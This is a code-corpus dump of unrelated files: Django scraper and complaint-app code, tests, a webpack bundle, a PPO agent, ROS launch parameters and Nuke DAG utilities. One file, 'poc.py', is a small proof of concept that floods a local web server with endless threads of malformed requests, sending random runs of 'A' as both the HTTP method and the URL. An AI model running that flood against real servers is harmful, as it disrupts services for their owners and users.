                # 'map_init_pose_pitch': 0.0,
                # 'map_init_pose_yaw': -math.pi / 2,
            }]),
        # Localizer
        Node(package='fiducial_vlam', node_executable='vloc_node', output='log',
             node_name='vloc_node', node_namespace=camera_name, parameters=[{
                'publish_tfs': 1,
                'publish_camera_pose': 0,
                'publish_base_pose': 0,
                'publish_camera_odom': 0,
                'publish_base_odom': 1,
                'publish_image_marked': 0,
                'stamp_msgs_with_current_time': 0,  # Use incoming message time, not now()
                'camera_frame_id': camera_frame,
                # camera-to-base transform — NOTE(review): values look measured
                # from the vehicle; confirm against the URDF
                't_camera_base_x': 0.,
                't_camera_base_y': 0.063,
                't_camera_base_z': -0.16,
                't_camera_base_roll': 0.,
                't_camera_base_pitch': -math.pi / 2,
                't_camera_base_yaw': math.pi / 2
            }]),
    ])
| 2.46875 | 2 |
back/apps/spiders/models.py | Andrey-Omelyanuk/project-template | 0 | 12766433 | from celery import chain
from django.db.models import Model, CASCADE, ForeignKey, CharField, TextField, DateTimeField, BooleanField, IntegerField, JSONField
from django.db.models.signals import post_save
from django.dispatch import receiver
from .tasks.run_spider import run_spider
from .tasks.load_data_to_db import load_data_to_db
class Spider(Model):
    """A registered scraper; ``name`` must match a module under apps/spiders/spiders/."""
    name = CharField(max_length=128, unique=True, help_text='use spider from apps/spiders/spiders/<name>.py')
    desc = TextField(default='')

    def __str__(self):
        return str(self.name)
class Session(Model):
    """One crawl run of a spider, tracking scrape and DB-load timestamps."""
    spider = ForeignKey(Spider, on_delete=CASCADE)
    started = DateTimeField(auto_now_add=True)
    finished = DateTimeField(blank=True, null=True)
    load_started = DateTimeField(blank=True, null=True)
    load_finished = DateTimeField(blank=True, null=True)

    def __str__(self):
        return '{} {} - {}'.format(self.spider.name, self.started, self.finished)
@receiver(post_save, sender=Session)
def run_spider_if_session_was_created(sender, instance, created, **kwargs):
    """On Session creation, run the spider and then load the scraped data.

    BUGFIX: the old handler both called ``run_spider.delay(instance.id)`` and
    queued the ``run_spider | load_data_to_db`` chain, so the spider task was
    executed twice per created session.  Only the chain is kept.
    """
    if created:
        (run_spider.s(instance.id) | load_data_to_db.s(instance.id)).apply_async()
class Site(Model):
    """A scraped web site, identified by its base URL."""
    url = CharField(max_length=256, unique=True)
    desc = TextField(default='')

    def __str__(self):
        return str(self.url)
class Page(Model):
    """A page of a :class:`Site`; ``url`` is the path relative to ``site.url``."""
    site = ForeignKey(Site, on_delete=CASCADE)
    url = CharField(max_length=512, unique=True, help_text='Url without domain. You can find domain in site.url .')
    last_visit = DateTimeField(help_text='When spider was on the page in last time.')

    def __str__(self):
        return '{}{}'.format(self.site.url, self.url)
class Article(Model):
    """Latest known state of an article; unique per (site, idx)."""
    site = ForeignKey(Site, on_delete=CASCADE)
    idx = CharField(max_length=256, help_text='ID or Slug.')
    last_updated = DateTimeField(help_text='Datetime from ArticleSnapshot.timestamp')
    title = TextField(help_text='Title.')
    body = TextField(help_text='Main text of article')
    publish_date = DateTimeField(blank=True, null=True, help_text='')

    class Meta:
        unique_together = (("site", "idx"),)
class ArticleSnapshot(Model):
    """What an article looked like on a given page during a given session."""
    session = ForeignKey(Session, on_delete=CASCADE)
    page = ForeignKey(Page, on_delete=CASCADE)
    article = ForeignKey(Article, on_delete=CASCADE)
    timestamp = DateTimeField(help_text='Datetime when data was read from page.')
    title = CharField(default='', blank=True, max_length=256, help_text='Title.')
    body = JSONField(default=dict, help_text='Desc that was scriped from page.')
    publish_date = DateTimeField(blank=True, null=True, help_text='')

    class Meta:
        unique_together = (("session", "page", "article"),)
| 2.21875 | 2 |
complaint/views.py | kodi-sk/CSI-WIP | 0 | 12766434 | <gh_stars>0
from django.shortcuts import render, redirect
from django.http import Http404, HttpResponse
from django import forms
from django.contrib.auth.models import User
from django.http import HttpResponse
from django.shortcuts import render
from complaint.models import Complaint
from django.contrib.auth.decorators import login_required
def index(request):
    """Render every complaint on the public print page."""
    complaints = Complaint.objects.all()
    return render(request, 'complaint/print.html', {'all_complaint': complaints})
@login_required(login_url="/")
def resolved(request, cid):
    """Mark the complaint with primary key *cid* as resolved, then return to the list."""
    complaint = Complaint.objects.get(id=int(cid))
    complaint.resolved = True
    complaint.save()
    # NOTE: removed the dead assignment 'html = remove.resolved' (never used)
    return redirect(show_complaints)
@login_required(login_url="/")
def detail(request, cid):
    """Show a single complaint identified by primary key *cid*."""
    complaint = Complaint.objects.get(pk=cid)
    return render(request, 'complaint/complaint.html', {'complaint': complaint})
@login_required(login_url="/")
def show_complaints(request):
    """List every complaint for a logged-in user."""
    return render(request, 'prints.html', {'complaints': Complaint.objects.all()})
@login_required(login_url="/")
def reject(request, get_id):
    """Mark the complaint *get_id* as invalid (rejected), then return to the list."""
    complaint = Complaint.objects.get(id=int(get_id))
    complaint.validity = False
    complaint.save()
    # NOTE: removed the dead assignment 'html = remove.validity' (never used)
    return redirect(show_complaints)
def signup(request):
    """Register a new user from POSTed credentials, or render the signup form.

    Uses ``User.objects.create_user`` which hashes the password and saves
    in one step, replacing the manual User()/set_password()/save() sequence.
    """
    if request.method == "POST":
        name = request.POST.get('user', None)
        email = request.POST.get('email', None)
        password = request.POST.get('password', None)
        User.objects.create_user(username=name, email=email, password=password)
        return redirect(show_complaints)
    return render(request, 'registration/register.html')
| 2.078125 | 2 |
dashboard_app/tests/models_tests.py | bitlabstudio/django-dashboard-app | 10 | 12766435 | """Tests for the models of the ``django-metrics-dashboard`` app."""
from django.test import TestCase
from .. import models
from .factories import DashboardWidgetSettingsFactory
class DashboardWidgetLastUpdateTestCase(TestCase):
    """Tests for the ``DashboardWidgetLastUpdate`` model class."""
    longMessage = True

    def test_model(self):
        # Saving a bare instance should assign a primary key.
        last_update = models.DashboardWidgetLastUpdate()
        last_update.save()
        self.assertTrue(last_update.pk)
class DashboardWidgetSettingsTestCase(TestCase):
    """Tests for the ``DashboardWidgetSettings`` model class."""
    longMessage = True

    def test_model(self):
        # The factory should create and persist a settings row.
        setting = DashboardWidgetSettingsFactory()
        self.assertTrue(setting.pk)
| 2.375 | 2 |
geo_knowledge_hub/modules/frontpage/webpack.py | geo-knowledge-hub/geo-knowledge-hub | 12 | 12766436 | # -*- coding: utf-8 -*-
#
# Copyright (C) 2021 GEO Secretariat.
#
# geo-knowledge-hub is free software; you can redistribute it and/or
# modify it under the terms of the MIT License; see LICENSE file for more
# details.
from invenio_assets.webpack import WebpackThemeBundle
# Webpack bundle exposing the front-page theme assets (semantic-ui only).
theme = WebpackThemeBundle(
    __name__,
    "theme/assets",
    default="semantic-ui",
    themes={
        "semantic-ui": dict(
            entry={
                "geo-knowledge-hub-frontpage-theme": "./less/geo_knowledge_hub/frontpage/theme.less"
            },
            dependencies={
            }
        )
    }
)
| 1.273438 | 1 |
policy/rl_policy.py | yangmuzhi/wuziqi | 0 | 12766437 | """
ppo rl algo
"""
import numpy as np
from tqdm import tqdm

from .algo.ppo import PPO
class ppo_agent(object):
    """PPO-backed policy for a size x size board game with an action mask.

    NOTE(review): the original constructor ignored every argument and built
    PPO with all-None dims/functions; the arguments are now forwarded.
    """

    def __init__(self, dims_obs, dim_act, policy_fn, value_fn, size):
        self.ppo = PPO(rnd=0, dim_obs=dims_obs, dim_act=dim_act,
                       policy_fn=policy_fn, value_fn=value_fn,
                       discount=0.99, gae=0.95, clip_ratio=0.2,
                       train_epoch=40, policy_lr=1e-3, value_lr=1e-3,
                       save_path="./log", log_freq=10, save_model_freq=100)
        self.size = size

    def reset(self):
        # Remaining legal actions and a parallel boolean mask over the board.
        self.actions = set(range(self.size ** 2))
        self.actions_ind = [True] * (self.size ** 2)

    def get_action(self, obs, forbidden_actions):
        """Return the highest-probability action among still-legal moves.

        BUGFIX: the original aliased the live set (``action = self.actions``)
        so the computed difference was always empty, then indexed the Python
        list with a *set* (TypeError), and took the argmax index within the
        masked array instead of mapping it back to a board index.
        """
        newly_forbidden = self.actions.intersection(forbidden_actions)
        self.actions.difference_update(forbidden_actions)
        for a in newly_forbidden:
            self.actions_ind[a] = False
        action_prob = np.asarray(self.ppo.get_action(obs))
        # argmax over legal entries only, mapped back to full action indices
        legal = [a for a in range(self.size ** 2) if self.actions_ind[a]]
        return legal[int(np.argmax(action_prob[legal]))]

    def update(self, databatch):
        # Delegate the PPO optimisation step.
        self.ppo.update(databatch)
trafficgen/benignGenerator/DataGen/wordpressautonew/poc.py | cyberdeception/deepdig | 5 | 12766438 | #! /usr/bin/env python
import httplib
import sys
import threading
import subprocess
import random
def send_request(method, url):
    # Issue one HTTP request with an arbitrary (possibly malformed) method
    # against the local server on port 80.  Prints the response body when the
    # URL contains "foo".  All errors are printed and swallowed so the flood
    # loops below keep running.
    try:
        c = httplib.HTTPConnection('127.0.0.1', 80)
        c.request(method,url);
        if "foo" in url:
            print c.getresponse().read()
        c.close()
    except Exception, e:
        print e
        pass
def mod_status_thread():
    # Endless loop of plain "GET /" requests run in a background thread.
    while True:
        send_request("GET", "/")
def requests():
    # Endless loop reusing one random run of 'A's (0-1024 chars) as both the
    # HTTP method and the URL, exercising the server's request parser.
    # NOTE(review): this function name shadows the popular 'requests' library;
    # harmless here since only httplib is used.
    evil = ''.join('A' for i in range(random.randint(0, 1024)))
    while True:
        send_request(evil, evil)
threading.Thread(target=mod_status_thread).start()
threading.Thread(target=requests).start()
| 2.8125 | 3 |
tools/python/nuketools/dag.py | cheekynie/nuke-config | 0 | 12766439 | <filename>tools/python/nuketools/dag.py<gh_stars>0
import nuke
import nukescripts
import operator, math, os
import string
import random
# Utilities for enhancing efficiency when interacting with Nuke's Directed Acyclic Graph
# Register keyboard shortcuts and menu entries
nuke.menu('Nuke').addCommand('Edit/Node/DAG/Move/Move Right', 'dag.move(4, 0)', 'alt+meta+Right')
nuke.menu('Nuke').addCommand('Edit/Node/DAG/Move/Move Left', 'dag.move(-4, 0)', 'alt+meta+Left')
nuke.menu('Nuke').addCommand('Edit/Node/DAG/Move/Move Up', 'dag.move(0, -4)', 'alt+meta+Up')
nuke.menu('Nuke').addCommand('Edit/Node/DAG/Move/Move Down', 'dag.move(0, 4)', 'alt+meta+Down')
nuke.menu('Nuke').addCommand('Edit/Node/DAG/Move/Move Right Big', 'dag.move(1, 0)', 'alt+meta+shift+Right')
nuke.menu('Nuke').addCommand('Edit/Node/DAG/Move/Move Left Big', 'dag.move(-1, 0)', 'alt+meta+shift+Left')
nuke.menu('Nuke').addCommand('Edit/Node/DAG/Move/Move Up Big', 'dag.move(0, -1)', 'alt+meta+shift+Up')
nuke.menu('Nuke').addCommand('Edit/Node/DAG/Move/Move Down Big', 'dag.move(0, 1)', 'alt+meta+shift+Down')
nuke.menu('Nuke').addCommand('Edit/Node/DAG/Scale/Scale Up Vertical', 'dag.scale(1, 2)', 'meta+shift++', shortcutContext=2)
nuke.menu('Nuke').addCommand('Edit/Node/DAG/Scale/Scale Down Vertical', 'dag.scale(1, 0.5)', 'meta+shift+_', shortcutContext=2)
nuke.menu('Nuke').addCommand('Edit/Node/DAG/Scale/Scale Up Horizontal', 'dag.scale(0, 2)', 'meta+=', shortcutContext=2)
nuke.menu('Nuke').addCommand('Edit/Node/DAG/Scale/Scale Down Horizontal', 'dag.scale(0, 0.5)', 'meta+-', shortcutContext=2)
nuke.menu('Nuke').addCommand('Edit/Node/DAG/Mirror Horizontal from Right', 'dag.scale(0, -1, pivot="min")', 'meta+m')
nuke.menu('Nuke').addCommand('Edit/Node/DAG/Mirror Horizontal from Left', 'dag.scale(0, -1, pivot="max")', 'meta+shift+m')
nuke.menu('Nuke').addCommand('Edit/Node/DAG/Mirror Vertical from Top', 'dag.scale(1, -1, pivot="max")', 'ctrl+meta+alt+m')
nuke.menu('Nuke').addCommand('Edit/Node/DAG/Mirror Vertical from Bottom', 'dag.scale(1, -1, pivot="min")', 'ctrl+alt+meta+shift+m')
nuke.menu('Nuke').addCommand('Edit/Node/DAG/Align/Left', 'dag.align("left")', 'ctrl+shift+left', shortcutContext=2)
nuke.menu('Nuke').addCommand('Edit/Node/DAG/Align/Right', 'dag.align("right")', 'ctrl+shift+right', shortcutContext=2)
nuke.menu('Nuke').addCommand('Edit/Node/DAG/Align/Up', 'dag.align("up")', 'ctrl+shift+up', shortcutContext=2)
nuke.menu('Nuke').addCommand('Edit/Node/DAG/Align/Down', 'dag.align("down")', 'ctrl+shift+down', shortcutContext=2)
nuke.menu('Nuke').addCommand('Edit/Node/DAG/Snap to Grid', 'dag.snap_to_grid()', 'alt+s', shortcutContext=2)
nuke.menu('Nuke').addCommand('Edit/Node/DAG/Connect Selected to Closest', 'dag.connect_to_closest()', 'meta+shift+y', shortcutContext=2)
nuke.menu('Nuke').addCommand('Edit/Node/DAG/Connect Closest to Selected', 'dag.connect_to_closest(direction=1)', 'alt+meta+shift+y', shortcutContext=2)
nuke.menu('Nuke').addCommand('Edit/Node/DAG/Paste To Selected', 'dag.paste_to_selected()', 'alt+v', shortcutContext=2)
nuke.menu('Nuke').addCommand('Edit/Node/DAG/Read from Write', 'dag.read_from_write()', 'alt+r', shortcutContext=2)
nuke.menu('Nuke').addCommand('Edit/Select Similar/Select Similar Class', 'nuke.selectSimilar(nuke.MATCH_CLASS)', 'alt+meta+shift+s', shortcutContext=2)
nuke.menu('Nuke').addCommand('Edit/Select Similar/Select Similar Color', 'nuke.selectSimilar(nuke.MATCH_COLOR)', 'alt+meta+shift+c', shortcutContext=2)
nuke.menu('Nuke').addCommand('Edit/Select Similar/Select Similar Y Position', 'dag.select_similar_position(axis=1)', 'alt+meta+shift+v', shortcutContext=2)
nuke.menu('Nuke').addCommand('Edit/Select Similar/Select Similar X Position', 'dag.select_similar_position(axis=0)', 'ctrl+alt+meta+shift+v', shortcutContext=2)
nuke.menu('Nuke').addCommand('Edit/Select Upstream', 'dag.select_upstream(nuke.selectedNodes())', 'alt+meta+shift+u', shortcutContext=2)
nuke.menu('Nuke').addCommand('Edit/Invert Selection', 'nuke.invertSelection()', 'alt+meta+shift+i', shortcutContext=2)
nuke.menu('Nuke').addCommand('Edit/Select Connected Nodes', 'dag.select_connected(nuke.selectedNodes())', 'alt+meta+shift+o', shortcutContext=2)
nuke.menu('Nuke').addCommand('Edit/Select Downstream', 'dag.select_downstream(nuke.selectedNodes())', 'alt+meta+shift+p', shortcutContext=2)
nuke.menu('Nuke').addCommand('Edit/Select Unused Nodes', 'dag.select_unused(nuke.selectedNodes())', 'ctrl+alt+meta+shift+u', shortcutContext=2)
nuke.menu('Nuke').addCommand('Edit/Node/DAG/Properties Panel Open', 'dag.open_panels()', 'a', shortcutContext=1)
nuke.menu('Nuke').addCommand('Edit/Node/DAG/Properties Panel Close', 'dag.close_panels()', 'alt+a', shortcutContext=1)
nuke.menu('Nuke').addCommand('Edit/Node/DAG/Sort By File Knob', 'dag.auto_place()', 'l', shortcutContext=2)
nuke.menu('Nuke').addCommand('Edit/Node/Declone', 'dag.declone_nodes(nuke.selectedNodes())', 'alt+shift+k', shortcutContext=2)
nuke.menu('Nuke').addCommand('File/Export Selected with Root Settings', 'dag.export_selected_nodes()', 'ctrl+shift+e', index=7)
nuke.menu('Nuke').addCommand('File/Import Script', 'nukescripts.import_script()', 'ctrl+shift+i', index=8)
nuke.menu('Nuke').addCommand('Edit/Node/Swap A - B', 'dag.swap_node()', 'shift+x')
nuke.menu('Viewer').addCommand("Swap View", "dag.swap_view()", "shift+q")
nuke.menu('Nodes').addCommand( 'Transform/Transform', 'dag.create_transform()', 't')
nuke.menu('Nodes').addCommand('Other/Create Dots', 'dag.create_dots()', 'alt+d', shortcutContext=2)
nuke.menu('Nodes').addCommand('Other/Create Side Dots', 'dag.create_dots(side=True)', 'alt+shift+d', shortcutContext=2)
# DAG Position Commands
nuke.menu('Nuke').addCommand('Edit/Bookmark/Restore Position 1', 'nukescripts.bookmarks.quickRestore(1)', 'ctrl+1', shortcutContext=2)
nuke.menu('Nuke').addCommand('Edit/Bookmark/Restore Position 2', 'nukescripts.bookmarks.quickRestore(2)', 'ctrl+2', shortcutContext=2)
nuke.menu('Nuke').addCommand('Edit/Bookmark/Restore Position 3', 'nukescripts.bookmarks.quickRestore(3)', 'ctrl+3', shortcutContext=2)
nuke.menu('Nuke').addCommand('Edit/Bookmark/Restore Position 4', 'nukescripts.bookmarks.quickRestore(4)', 'ctrl+4', shortcutContext=2)
nuke.menu('Nuke').addCommand('Edit/Bookmark/Restore Position 5', 'nukescripts.bookmarks.quickRestore(5)', 'ctrl+5', shortcutContext=2)
nuke.menu('Nuke').addCommand('Edit/Bookmark/Restore Position 6', 'nukescripts.bookmarks.quickRestore(6)', 'ctrl+6', shortcutContext=2)
nuke.menu('Nuke').addCommand('Edit/Bookmark/Save Position 1', 'nukescripts.bookmarks.quickSave(1)', 'ctrl+shift+1', shortcutContext=2)
nuke.menu('Nuke').addCommand('Edit/Bookmark/Save Position 2', 'nukescripts.bookmarks.quickSave(2)', 'ctrl+shift+2', shortcutContext=2)
nuke.menu('Nuke').addCommand('Edit/Bookmark/Save Position 3', 'nukescripts.bookmarks.quickSave(3)', 'ctrl+shift+3', shortcutContext=2)
nuke.menu('Nuke').addCommand('Edit/Bookmark/Save Position 4', 'nukescripts.bookmarks.quickSave(4)', 'ctrl+shift+4', shortcutContext=2)
nuke.menu('Nuke').addCommand('Edit/Bookmark/Save Position 5', 'nukescripts.bookmarks.quickSave(5)', 'ctrl+shift+5', shortcutContext=2)
nuke.menu('Nuke').addCommand('Edit/Bookmark/Save Position 6', 'nukescripts.bookmarks.quickSave(6)', 'ctrl+shift+6', shortcutContext=2)
# # Hlink Nodes
# nuke.menu('Nuke').addCommand('Edit/HLink Cut', 'dag.hlink_cut()', 'ctrl+x')
# nuke.menu('Nuke').addCommand('Edit/HLink Copy', 'dag.hlink_copy()', 'ctrl+c')
# nuke.menu('Nuke').addCommand('Edit/HLink Paste', 'dag.hlink_paste()', 'ctrl+v')
# nuke.menu('Nuke').addCommand('Edit/HLink Create', 'dag.hlink_create()', 'alt+shift+p')
# nuke.menu('Nuke').addCommand('Edit/Paste', 'nuke.nodePaste("%clipboard%")', 'ctrl+shift+v', index=6)
nuke.menu('Nodes').addCommand('Other/Create Pointer', 'dag.create_pointer()', 'alt+t')
# Get the grid size from the preferences. Used as the default unit of movement.
grid = (int(nuke.toNode('preferences').knob('GridWidth').value()), int(nuke.toNode('preferences').knob('GridHeight').value()))
def unselect(nodes=None):
    """Deselect *nodes*, or every node in the script (recursively) when None."""
    if not nodes:
        nodes = nuke.allNodes(recurseGroups=True)
    if not isinstance(nodes, list):
        return
    for node in nodes:
        node.setSelected(False)
def select(nodes):
    """Select every node in *nodes*; ignores anything that is not a list."""
    if not isinstance(nodes, list):
        return
    for node in nodes:
        node.setSelected(True)
def get_parent(node):
    """Return the group that contains *node*, or nuke.root() at the top level."""
    parent_name = '.'.join(node.fullName().split('.')[:-1])
    return nuke.toNode(parent_name) or nuke.root()
def get_topnode(node):
    # Return the topmost upstream node of *node*, resolved via Nuke's tcl
    # [topnode] command and looked back up by name.
    return nuke.toNode(nuke.tcl('return [value [topnode {0}].name]'.format(node.fullName())))
def get_pos(node):
    """Return [x, y]: the raw position for backdrops, otherwise the node centre."""
    x, y = node.xpos(), node.ypos()
    if node.Class() == 'BackdropNode':
        return [x, y]
    return [x + node.screenWidth()/2, y + node.screenHeight()/2]
def set_pos(node, posx, posy):
    """Place *node* so its centre (or top-left corner for backdrops) is (posx, posy)."""
    if node.Class() == 'BackdropNode':
        return node.setXYpos(int(posx), int(posy))
    return node.setXYpos(int(posx - node.screenWidth()/2),
                         int(posy - node.screenHeight()/2))
def hide_panel():
    # onUserCreate callback: hide the properties panel of every freshly
    # created node, except classes that need their panel open (Roto tools).
    node = nuke.thisNode()
    exceptions = ['Roto', 'RotoPaint']
    if node.Class() not in exceptions:
        # Shown then immediately hidden — presumably to force the panel into
        # a known state before hiding; confirm against Nuke panel behaviour.
        nuke.thisNode().showControlPanel()
        nuke.thisNode().hideControlPanel()
nuke.addOnUserCreate(hide_panel)
def open_panels(nodes=None):
    """Open the properties panel of *nodes* (default: current selection).

    Viewer nodes are skipped.  Asks for confirmation before opening more
    than 10 panels at once.  (A large slab of commented-out workaround code
    for a node.shown() bug was removed.)
    """
    if not nodes:
        nodes = nuke.selectedNodes()
    ignored = ['Viewer']
    if len(nodes) > 10:
        if not nuke.ask('Continuing will open {0} properties panels. \nAre you sure you want to continue?'.format(len(nodes))):
            return
    for node in nodes:
        if node.Class() not in ignored:
            node.showControlPanel()
def close_panels(nodes=None):
    """Hide the properties panel of *nodes* (default: every node, recursively)."""
    for node in (nodes or nuke.allNodes(recurseGroups=True)):
        node.hideControlPanel()
def select_similar_position(axis=1):
    # Select all nodes sharing (within 1 px) the first selected node's row
    # (axis=1) or column (axis=0), keeping the rest of the current selection.
    nodes = nuke.selectedNodes()
    if not nodes:
        return
    node = nodes[0]
    prev_selected = nodes[1:]
    threshold = 1
    unselect()
    select(prev_selected)
    if axis:
        # Same y position; collect x for stable selection order.
        same_pos_nodes = {n:n.xpos() for n in nuke.allNodes() if abs(n.ypos()- node.ypos()) < threshold}
    else:
        same_pos_nodes = {n:n.ypos() for n in nuke.allNodes() if abs(n.xpos()- node.xpos()) < threshold}
    sorted_nodes = sorted(same_pos_nodes.items(), key=operator.itemgetter(1))
    for n, pos in sorted_nodes:
        n.setSelected(True)
def snap_to_grid():
    """Snap every selected node onto the preference grid."""
    for node in nuke.selectedNodes():
        nuke.autoplaceSnap(node)
def auto_place():
    # autoplace all selected: nodes with a 'file' knob are laid out in a row
    # sorted by their file path; everything else gets Nuke's autoplace.
    nodes = nuke.selectedNodes()
    # Sort by file knob value if the nodes have one
    filenodes = {n: n['file'].getValue() for n in nodes if 'file' in n.knobs()}
    if filenodes:
        sorted_filenodes = sorted(filenodes.items(), key=operator.itemgetter(1))
        filenodes_pos = {n: [n.xpos(), n.ypos()] for n in nodes if 'file' in n.knobs()}
        # Row starts at the leftmost x and topmost y of the file nodes.
        ypos_sort = sorted(filenodes_pos.items(), key=lambda (k, v): v[1])
        xpos_sort = sorted(filenodes_pos.items(), key=lambda (k, v): v[0])
        start_pos = [xpos_sort[0][1][0], ypos_sort[0][1][1]]
        for node, filepath in sorted_filenodes:
            node.setXYpos(start_pos[0], start_pos[1])
            start_pos = (start_pos[0] + grid[0]*2, start_pos[1])
    # Normal autoplace for nodes without file knob
    normal_nodes = [n for n in nodes if 'file' not in n.knobs()]
    unselect()
    _ = [n.setSelected(True) for n in normal_nodes]
    nuke.autoplace_all()
    _ = [n.setSelected(True) for n in nodes]
def move(xvel, yvel):
    """Shift all selected nodes by (xvel, yvel) grid units; y is scaled 3x."""
    yvel *= 3
    for node in nuke.selectedNodes():
        new_x = int(node.xpos() + grid[0] * xvel)
        new_y = int(node.ypos() + grid[1] * yvel)
        node.setXYpos(new_x, new_y)
def get_closest_node(node):
    """Return the node nearest to *node* (Euclidean distance in DAG coordinates)."""
    distances = {}
    for other in nuke.allNodes():
        if other.name() == node.name():
            continue
        dx = node.xpos() - other.xpos()
        dy = node.ypos() - other.ypos()
        distances[other.name()] = math.sqrt(dx * dx + dy * dy)
    return nuke.toNode(min(distances, key=distances.get))
def connect_to_closest(direction=0):
    """Connect each selected node with its nearest neighbour.

    direction 0: the selected node takes the closest node as input 0;
    direction 1: the closest node takes the selected node as input 0.
    """
    for node in nuke.selectedNodes():
        closest = get_closest_node(node)
        if direction:
            closest.setInput(0, node)
        else:
            node.connectInput(0, closest)
def paste_to_selected():
    """Paste the clipboard once per selected node (connected to it), or once
    if nothing is selected; the pasted nodes end up selected.
    """
    nodes = nuke.selectedNodes()
    all_nodes = nuke.allNodes()
    unselect()
    for node in nodes:
        node.setSelected(True)
        # BUGFIX: the token was '%clipboard' (missing trailing '%'), which
        # does not reference Nuke's clipboard; '%clipboard%' matches the
        # usage elsewhere in this module.
        nuke.nodePaste('%clipboard%')
        unselect()
    if not nodes:
        nuke.nodePaste('%clipboard%')
    # Select pasted nodes (everything that was not present before the paste)
    select(all_nodes)
    nuke.invertSelection()
def align(direction):
    # Align nodes to the farthest outlier in the specified direction.
    # param: direction - one of: left | right | up | down
    # Nodes that would overlap after aligning are fanned out by one grid
    # unit each along the other axis.
    nodes = nuke.selectedNodes()
    if len(nodes) < 2:
        return
    horizontally = ['left', 'right']
    vertically = ['up', 'down']
    if direction in horizontally:
        align = 0
    elif direction in vertically:
        align = 1
    else:
        print 'Error: invalid direction specified: {0}'.format(direction)
        return
    positions = {n: get_pos(n) for n in nodes}
    sorted_positions = sorted(positions.items(), key=lambda (k, v): v[align])
    if direction in ['down', 'right']:
        sorted_positions.reverse()
    # The farthest node in the requested direction is the alignment target.
    target = sorted_positions[0]
    target_pos = target[1]
    offset = 0
    other_axis = abs(1 - align)
    sorted_other_axis = sorted(positions.items(), key=lambda (k, v): v[other_axis])
    nuke.Undo().begin()
    for i in range(len(sorted_other_axis)):
        node = sorted_other_axis[i][0]
        pos = sorted_other_axis[i][1]
        if i == 0:
            distance = 0
            overlapping = False
            prev_pos = pos
        else:
            prev_pos = sorted_other_axis[i-1][1]
            # Compare current node position to previous node position.
            # If difference is < overlap threshold, nodes are overlapping.
            distance = abs(pos[other_axis] + grid[other_axis] * offset - prev_pos[other_axis])
            overlap_threshold = [int(node.screenWidth() * 1.1), int(node.screenHeight() * 1.1)]
            overlapping = distance < overlap_threshold[other_axis]
        if overlapping:
            offset += 1
        new_pos = pos
        new_pos[other_axis] = int(pos[other_axis] + grid[other_axis] * offset)
        # Set value into sorted_other_axis also so we access the right value on the next loop
        sorted_other_axis[i][1][other_axis] = new_pos[other_axis]
        if align:
            set_pos(node, new_pos[other_axis], target_pos[align])
        else:
            set_pos(node, target_pos[align], new_pos[other_axis])
        i += 1
    nuke.Undo().end()
def scale(axis, scale, pivot='max'):
# Scale selected nodes by factor of xscale, yscale
# param: axis - one of 0 or 1 - x or y scale
# param: float scale - factor to scale. 1 will do nothing. 2 will scale up 1 grid unit.
# param: str pivot - where to scale from. One of min | max | center
pivots = ['min', 'max', 'center']
if pivot not in pivots:
return
nodes = nuke.selectedNodes()
if len(nodes) < 2:
return
positions = {n: get_pos(n) for n in nodes}
sort = sorted(positions.items(), key=lambda (k, v): v[axis])
minpos = sort[0][1][axis]
maxpos = sort[-1][1][axis]
if pivot == 'max':
pivot_pos = maxpos
elif pivot == 'min':
pivot_pos = minpos
elif pivot == 'center':
pivot_pos = (minpos - maxpos)/2 + minpos
nuke.Undo().begin()
for node, pos in positions.iteritems():
if axis:
new_pos = (pos[1] - pivot_pos) * scale + pivot_pos
set_pos(node, pos[0], new_pos)
if node.Class() == 'BackdropNode':
bdpos = ((pos[1] + node['bdheight'].getValue()) - pivot_pos) * scale + pivot_pos - node.ypos()
print pos[1]
print new_pos
print bdpos
if scale > 0:
node['bdheight'].setValue(bdpos)
else:
node.setXYpos(pos[0], int(new_pos-abs(bdpos)))
else:
new_pos = (pos[0] - pivot_pos) * scale + pivot_pos
set_pos(node, new_pos, pos[1])
if node.Class() == 'BackdropNode':
bdpos = ((pos[0] + node['bdwidth'].getValue()) - pivot_pos) * scale + pivot_pos - node.xpos()
if scale > 0:
node['bdwidth'].setValue(bdpos)
else:
node.setXYpos(int(new_pos-abs(bdpos)), int(node.ypos()))
nuke.Undo().end()
def copy_inputs(src, dst):
    """Rewire *dst* so its inputs mirror *src* (input counts must match)."""
    # Clear dst first, then mirror each of src's inputs in order.
    for idx in range(dst.inputs()):
        dst.setInput(idx, None)
    for idx in range(src.inputs()):
        dst.setInput(idx, src.input(idx))
def declone(node):
    # Replace a cloned node with an independent copy carrying the same knob
    # values and input connections; returns the new node (None if *node* is
    # not a clone).
    if not node.clones():
        return
    parent = get_parent(node)
    parent.begin()
    node.setSelected(True)
    args = node.writeKnobs( nuke.WRITE_ALL | nuke.WRITE_USER_KNOB_DEFS |
                        nuke.WRITE_NON_DEFAULT_ONLY | nuke.TO_SCRIPT)
    decloned_node = nuke.createNode(node.Class(), knobs=args, inpanel=False)
    copy_inputs(node, decloned_node)
    nuke.delete(node)
    parent.end()
    return decloned_node
def declone_nodes(nodes):
    """Declone *nodes*; a more reliable alternative to nukescripts.misc.declone()."""
    unselect()
    replacements = [declone(node) for node in nodes]
    if replacements:
        # Restore selection on the replacement nodes
        _ = [n.setSelected(True) for n in replacements]
def export_selected_nodes():
    """Export the selected nodes to a .nk file, prepending the project Root settings."""
    path = nuke.getFilename("Export Selected To:")
    if not path:
        return
    nuke.nodeCopy(path)
    root = nuke.root()
    rootstring = root.writeKnobs(nuke.TO_SCRIPT | nuke.WRITE_USER_KNOB_DEFS)
    rootstring = "%s\nfirst_frame %d\nlast_frame %d" % (rootstring, root['first_frame'].value(), root['last_frame'].value())
    rootstring = "%s\nproxy_format \"%s\"" % (rootstring, root['proxy_format'].toScript())
    rootstring = "Root {\n%s\n}" % rootstring
    # BUGFIX: read through a context manager instead of leaking the handle
    # from a bare open(path).read().
    with open(path) as f:
        noroot = f.read()
    with open(path, "w+") as f:
        f.write(rootstring + "\n" + noroot)
#--------------------------------------------------------------
# Nuke Node Dependency Utilities
if nuke.NUKE_VERSION_MAJOR > 11:
connection_filter = nuke.INPUTS | nuke.HIDDEN_INPUTS | nuke.EXPRESSIONS | nuke.LINKINPUTS
else:
connection_filter = nuke.INPUTS | nuke.HIDDEN_INPUTS | nuke.EXPRESSIONS
def find_root_nodes(node, results=None, remove_roots_with_inputs=True):
    """Recursively collect the root (source) nodes feeding *node*.

    Args:
        node: node whose upstream tree is walked via dependencies().
        results: accumulator list used internally by the recursion;
            leave as None. (The previous mutable default ``[]`` was
            shared between calls, so results leaked from one call to
            the next.)
        remove_roots_with_inputs: drop roots that can still take inputs
            (like Roto), keeping only true sources (maxInputs() == 0).

